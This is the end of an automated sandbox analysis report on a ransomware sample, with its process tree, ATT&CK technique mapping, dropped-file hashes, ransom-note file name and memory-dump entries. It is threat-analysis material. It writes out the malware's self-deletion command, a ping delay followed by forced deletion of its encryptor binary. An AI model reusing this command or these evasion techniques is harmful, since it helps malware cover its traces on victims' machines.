PID:1936

C:\Windows\SysWOW64\notepad.exe
notepad.exe C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:1552

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\enc.exe"
2⤵
- Deletes itself
PID:940

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
3⤵
- Runs ping.exe
PID:1800

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1636

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1832

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Deletion

T1107

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
e5e9a3387c8b9b00285476ce23f70238

SHA1
cb7da250ddf0c84c03c8f2d7a96af35977c300ed

SHA256
9698cf6cdb8c1a9055230dfade39e9ee0652b553ba026e83f83787d6fc193e89

SHA512
5b94f33ab753f30b2beb5d5ff725bff467ff57811425dd9a3f73db046eb4f8fcbc856cd90b4cfcdeccc90372195fa5d1fcea702ecd7f2ecdce331ba6943861e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
e5e9a3387c8b9b00285476ce23f70238

SHA1
cb7da250ddf0c84c03c8f2d7a96af35977c300ed

SHA256
9698cf6cdb8c1a9055230dfade39e9ee0652b553ba026e83f83787d6fc193e89

SHA512
5b94f33ab753f30b2beb5d5ff725bff467ff57811425dd9a3f73db046eb4f8fcbc856cd90b4cfcdeccc90372195fa5d1fcea702ecd7f2ecdce331ba6943861e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
b59995780f2fc96f4b8c1816ada0da48

SHA1
107a7a63addbfae2ebd90562a5daad5d5c2ee294

SHA256
6193f83543908470f2c3d184c559113b24038905b7b315d010f6a98f18f421b6

SHA512
0f7ee84e313362fa57294651cfe1965a5fc830a93dd2aaf9a4cd4639014319b1c4f40120b36c694cf3b34d2d2082f421da731c6019166031724266a12f25e363

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
e51f5e8dab0dc1694b49e64a63307a66

SHA1
f20971ab59bdfb11707e0f145a0866f8ea256356

SHA256
85c22e208c80c3e20bda78fd418ff563ee786d68f3719e6784aeb93eaaa38854

SHA512
8501e473e57ca8c964b0c20cbabdd5278274aaca50d2f578a352eb3e7f761b756edd6916bc62dc9157161b237dd0bac3aa1905a89e40efed925646a8814f25fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
887ae0db192785398c154a027c858317

SHA1
9e1258a3444e7f54d4a2b23bec0c020d67f285b6

SHA256
9841fc54844c86d073907913cfd2fccc49d13db491e790c6aeb30b7159e62bf5

SHA512
65364e8797ecc23d9eac18cfe0c1393e9429ee15cde33b7b936c917608196da7bf53ba7c21d9bb637c9a91797eb58a4dbb2346dc4bd9e6c947a711b381dfcb76

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
e6403f25d17fafd94d88dab8d559f954

SHA1
e17199a85b3f639f7e4958f66a6d11aea472f737

SHA256
4f7cd25d024340380515e1647d23d6bc46c5fec3f437d8c2d7f933eb86eab2b4

SHA512
0b4389edfad1635810fbf3b69d58ba1181147164e033c1ea325dbbb2361eca74c992d1ea3c83355b6a9249600efeea04e58643cdfbc90cd4d1349f42ede88e18

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
e6403f25d17fafd94d88dab8d559f954

SHA1
e17199a85b3f639f7e4958f66a6d11aea472f737

SHA256
4f7cd25d024340380515e1647d23d6bc46c5fec3f437d8c2d7f933eb86eab2b4

SHA512
0b4389edfad1635810fbf3b69d58ba1181147164e033c1ea325dbbb2361eca74c992d1ea3c83355b6a9249600efeea04e58643cdfbc90cd4d1349f42ede88e18

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
87cf292058eb08c907e2129e15100ed2

SHA1
0533d6387da50f84333707ac6a4165a9e46e6f17

SHA256
3f9f7a3913d2fde0c1cc93c537641f3a5de4fa2859790a5e5defa2522ee38532

SHA512
1da4950cc8fbc1efd84ae92f6419dc92b1ebb0d5211b5bb65d3fdf0ebf1823d447555c12327f83002a7d2b8354e6200af6ec59141774f7551df5acedf2c211d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
87cf292058eb08c907e2129e15100ed2

SHA1
0533d6387da50f84333707ac6a4165a9e46e6f17

SHA256
3f9f7a3913d2fde0c1cc93c537641f3a5de4fa2859790a5e5defa2522ee38532

SHA512
1da4950cc8fbc1efd84ae92f6419dc92b1ebb0d5211b5bb65d3fdf0ebf1823d447555c12327f83002a7d2b8354e6200af6ec59141774f7551df5acedf2c211d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
0f2e565e7cd9df67ed466c68285c92f8

SHA1
dac129b57aab5a16b0490fbdaa2bf13d451a7941

SHA256
cc270aa8f1bd55907831d0c54748347f3d81252c1711e878b117b01cdeaed490

SHA512
c3a7713fe3d203e1bed9d468ec3de2b590db8e5a4a9b5486b2e9bea157808aeee19231aba5f7a0c3216fa2118c002bf62ef68ec51dc5349341a92ced205a4435

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
0f2e565e7cd9df67ed466c68285c92f8

SHA1
dac129b57aab5a16b0490fbdaa2bf13d451a7941

SHA256
cc270aa8f1bd55907831d0c54748347f3d81252c1711e878b117b01cdeaed490

SHA512
c3a7713fe3d203e1bed9d468ec3de2b590db8e5a4a9b5486b2e9bea157808aeee19231aba5f7a0c3216fa2118c002bf62ef68ec51dc5349341a92ced205a4435

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
a28aec31cbd38485181a7079419aa66b

SHA1
94aa44c58417a4195fe786679b1feb793e69d135

SHA256
8828e5a883a98217828f794f9405e06e2ef2ca1025288e52b70c477d045e19ad

SHA512
3914be3a8745d604175f208940dba77455e8ad76f8629e1bdf4f3b340b0198a8a1c42f101f4eb70c5f47b8eeca48eceed119175a3641dd37811192cc24661468

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
a28aec31cbd38485181a7079419aa66b

SHA1
94aa44c58417a4195fe786679b1feb793e69d135

SHA256
8828e5a883a98217828f794f9405e06e2ef2ca1025288e52b70c477d045e19ad

SHA512
3914be3a8745d604175f208940dba77455e8ad76f8629e1bdf4f3b340b0198a8a1c42f101f4eb70c5f47b8eeca48eceed119175a3641dd37811192cc24661468

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
7f4ef85a6ca9054885e55a4185aa3d23

SHA1
7691ddefe6f344b335beca9d79657c9c52785050

SHA256
f85c1ee56d5d04e677ae8dfbdf9deb8111a1007f30218a1a2bc0806847c82422

SHA512
a77d1e2aac9711ec873714964b4933057d7a092b591321173e249bf770e22e8f7926179374a6161baa0c92e6cc3ff5846292cd55a58af9d8b8b0bfbff589fe36

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
84fc9373ea5f54c4ed110d319224d35e

SHA1
431978d9a749a7ca3812f73997b8400c2af3be79

SHA256
f59f1a3808b6783a19ba4d4196cbf48acfd42eb8e60b8e9d3ba836e558e3512e

SHA512
4d7c97ae3fe0904d548dc77c05c674d40284b8452dffe5a11411287e0242bb7658f3834b92f4935dcb1b22341c4572891524120d5e8af4a606d71e0b76a6c9d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
f5e6a7e5b545d3992410a229bd5a673c

SHA1
01d9a711d64aeef514131a680b641ef878c7e6f6

SHA256
4453eda2d3e1d286ff5ef8e429fb5e8d5d2fde33483a9a732269192c2630ffbe

SHA512
bc829ef60ec9fedc8442bef19c391d877ea3d33dbcc9be8d2d12696f482eadd81794f456b0776e3b1d78cd67482b389202b600e3b639aa72a7a73ed0fc05429c

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
f5e6a7e5b545d3992410a229bd5a673c

SHA1
01d9a711d64aeef514131a680b641ef878c7e6f6

SHA256
4453eda2d3e1d286ff5ef8e429fb5e8d5d2fde33483a9a732269192c2630ffbe

SHA512
bc829ef60ec9fedc8442bef19c391d877ea3d33dbcc9be8d2d12696f482eadd81794f456b0776e3b1d78cd67482b389202b600e3b639aa72a7a73ed0fc05429c

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
8777218f7fa6d1abc647e4c1ec1e15aa

SHA1
0fc95c851b83a0facdf5d3ca7ebce8c64d619558

SHA256
5d89c95e905478727637e3a54a3eb03acbb775b0ed306b8c55f1e51fbd3c20f5

SHA512
7fb0530e5d22f02b6af0ad0f9cf64dda5d35a4c523ae000805103efb9c22515cc3aaabc388c1589ffded324157612d675bed0678f93931534b5bf77402016271

Download Submit
C:\Users\Admin\AppData\Local\Temp\NTNNFVAWI
MD5
e8184159f8122495035adbe865f48acc

SHA1
60d64f750dfb7d0870eea5b679a3ce2acca05aed

SHA256
cb706b49ab3c92ac8e571d9d3089802991570262003356fec979a54b2a87e4e4

SHA512
612ec0297a756e7f6bf70561ada2c1b223119dce1451f66eaa5495d8a35b701f602af991bed25f1982a802333e8bb3da38e5fa3e8b4635e7d978d317e3203de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt
MD5
713c96a1a987aae2cdbab30cb6181817

SHA1
4fc34abe161d90159605b10c0f838fa0789a7c69

SHA256
f39847e43b3453b2799ea13380287d882b145734efc0ef17e316b855ffa40d59

SHA512
193df4c2609a0c2129d12519aa695c12d1dd6217623b25c7c8368bfb130cd6979720d07466952cfada81d16bd033b449fcaa18ce6a2449a65fdae5f6ab387bdd

Download Submit
C:\Users\Public\Desktop\WANNA_RECOVER_KOXIC_FILEZ_JEWLD.txt
MD5
713c96a1a987aae2cdbab30cb6181817

SHA1
4fc34abe161d90159605b10c0f838fa0789a7c69

SHA256
f39847e43b3453b2799ea13380287d882b145734efc0ef17e316b855ffa40d59

SHA512
193df4c2609a0c2129d12519aa695c12d1dd6217623b25c7c8368bfb130cd6979720d07466952cfada81d16bd033b449fcaa18ce6a2449a65fdae5f6ab387bdd

Download Submit
memory/520-57-0x0000000000000000-mapping.dmp

Download
memory/564-58-0x0000000000000000-mapping.dmp

Download
memory/576-81-0x0000000000000000-mapping.dmp

Download
memory/860-59-0x0000000000000000-mapping.dmp

Download
memory/916-86-0x0000000000000000-mapping.dmp

Download
memory/940-112-0x0000000000000000-mapping.dmp

Download
memory/948-83-0x0000000000000000-mapping.dmp

Download
memory/948-56-0x0000000000000000-mapping.dmp

Download
memory/952-55-0x0000000076B81000-0x0000000076B83000-memory.dmp

Filesize
8KB

Download
memory/972-66-0x0000000000000000-mapping.dmp

Download
memory/1048-103-0x0000000000000000-mapping.dmp

Download
memory/1056-88-0x0000000000000000-mapping.dmp

Download
memory/1064-69-0x0000000000000000-mapping.dmp

Download
memory/1112-76-0x0000000000000000-mapping.dmp

Download
memory/1144-89-0x0000000000000000-mapping.dmp

Download
memory/1176-60-0x0000000000000000-mapping.dmp

Download
memory/1184-98-0x0000000000000000-mapping.dmp

Download
memory/1448-91-0x0000000000000000-mapping.dmp

Download
memory/1492-84-0x0000000000000000-mapping.dmp

Download
memory/1552-111-0x0000000000000000-mapping.dmp

Download
memory/1580-78-0x0000000000000000-mapping.dmp

Download
memory/1608-79-0x0000000000000000-mapping.dmp

Download
memory/1612-74-0x0000000000000000-mapping.dmp

Download
memory/1624-93-0x0000000000000000-mapping.dmp

Download
memory/1636-107-0x000007FEFC2A1000-0x000007FEFC2A3000-memory.dmp

Filesize
8KB

Download
memory/1728-94-0x0000000000000000-mapping.dmp

Download
memory/1800-64-0x0000000000000000-mapping.dmp

Download
memory/1800-114-0x0000000000000000-mapping.dmp

Download
memory/1912-68-0x0000000000000000-mapping.dmp

Download
memory/1912-96-0x0000000000000000-mapping.dmp

Download
memory/1936-105-0x0000000000000000-mapping.dmp

Download
memory/1964-73-0x0000000000000000-mapping.dmp

Download
memory/1964-101-0x0000000000000000-mapping.dmp

Download
memory/1992-99-0x0000000000000000-mapping.dmp

Download
memory/2008-71-0x0000000000000000-mapping.dmp

Download
memory/2040-63-0x0000000000000000-mapping.dmp

Download
memory/2044-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads